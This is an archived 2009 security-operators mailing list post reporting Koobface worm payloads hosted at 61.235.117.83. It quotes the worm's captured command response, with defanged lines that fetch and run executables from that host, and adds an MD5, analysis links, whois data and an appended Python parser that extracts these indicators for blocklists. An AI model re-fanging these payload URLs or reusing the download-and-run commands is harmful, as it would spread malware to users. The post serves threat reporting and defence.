[nsp-sec] Attn: AS9394 | 61.235.117.83 - Koobface worm [Affecting Facebook & MySpace]
Shelton, Steve
sshelton at Cogentco.com
Thu Sep 10 09:34:59 EDT 2009
All,
I came across a few sites that were redirecting to what appears to be
related to Koobface worm payloads affecting Facebook and MySpace users.
Can someone proxy this Facebook & MySpace? Any CERTs or reps for
AS9394 that can negate the content on 61.235.117.83?
--- 09/10/09 07:12:30 Mountain Daylight Time
--- reading URL http://www. [Redacted] /.sys/?action=ldgen&v=14
--- contacting host www. [Redacted] [x.x.x.161] on port 80
HTTP/1.1 200 OK
Date: Thu, 10 Sep 2009 13:12:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.2
Content-Length: 307
Connection: close
Content-Type: text/html
#BLACKLABEL
#GEO=US
#IP=[Redacted]
#noparam
#PID=6145
STARTONCE|hxxp://61.235.117.83/bin/v2prx.exe [Example output below]
STARTONCE|hxxp://61.235.117.83/bin/pp.12.exe
WAIT|60
STARTONCEIMG|hxxp://61.235.117.83/bin/p.jpg|193854730d993dfgdfjkng345
START|hxxp://61.235.117.83/bin/v2webserver.exe
MD5|890394a3e971de7f3c7643db7e5543b5
http://wepawet.iseclab.org/view.php?hash=666945506e9f8c217f5a1a9af85d6ffa&t=1252588386&type=js
http://www.virustotal.com/analisis/497fe611aa93431a34cae1a5dcde7193907ea412a439c94353a472968118d647-1252548340
whois.cymru.com [2009-09-10 12:47:16 +0000]
9394 | 61.235.117.83 | CRNET CHINA RAILWAY Internet(CRNET)
peer-whois.cymru.com [2009-09-10 12:47:16 +0000]
4134 | 61.235.117.83 | CHINANET-BACKBONE No.31,Jin-rong Street
6453 | 61.235.117.83 | GLOBEINTERNET TATA Communications
Best regards,
Steve Shelton
Security Engineer
Cogent Communications
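Added example, not part of Steve's post: a small Python parser for the "#KEY=VALUE" header block and "VERB|arg|arg" command lines in the response quoted above, pulling out the download URLs, hosts, MD5 values and WAIT interval so they can be fed to a blocklist or a detection rule. The sample text is constructed from the lines in the post (URLs kept defanged as hxxp); the verb meanings are assumed from how they read there.

```python
import re

# Constructed sample, copied from the command list quoted in the post
# (URLs kept defanged as hxxp; the IP header stays redacted as in the post).
SAMPLE_RESPONSE = """#BLACKLABEL
#GEO=US
#IP=[Redacted]
#noparam
#PID=6145
STARTONCE|hxxp://61.235.117.83/bin/v2prx.exe
STARTONCE|hxxp://61.235.117.83/bin/pp.12.exe
WAIT|60
STARTONCEIMG|hxxp://61.235.117.83/bin/p.jpg|193854730d993dfgdfjkng345
START|hxxp://61.235.117.83/bin/v2webserver.exe
MD5|890394a3e971de7f3c7643db7e5543b5
"""

# Accepts live (http) and defanged (hxxp) scheme spellings; group 1 is the host.
URL_RE = re.compile(r"^h(?:tt|xx)ps?://([^/|\s]+)", re.IGNORECASE)
MD5_RE = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)

def parse_koobface_response(text):
    """Return raw headers, ordered (verb, args) commands, and the indicators a
    defender wants to block or alert on: URLs, hosts, MD5s, WAIT seconds.
    Unknown verbs are kept in 'commands' rather than silently dropped."""
    out = {"headers": {}, "commands": [], "urls": [], "hosts": set(),
           "hashes": [], "wait_seconds": None}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):             # '#noparam' becomes {'noparam': ''}
            key, _, value = line[1:].partition("=")
            out["headers"][key] = value
            continue
        verb, *args = line.split("|")
        out["commands"].append((verb, args))
        if verb == "WAIT" and args and args[0].isdigit():
            out["wait_seconds"] = int(args[0])
        for arg in args:                     # URLs and hashes may sit in any slot
            m = URL_RE.match(arg)
            if m:
                out["urls"].append(arg)
                out["hosts"].add(m.group(1).lower())
            elif MD5_RE.match(arg):
                out["hashes"].append(arg.lower())
    return out
```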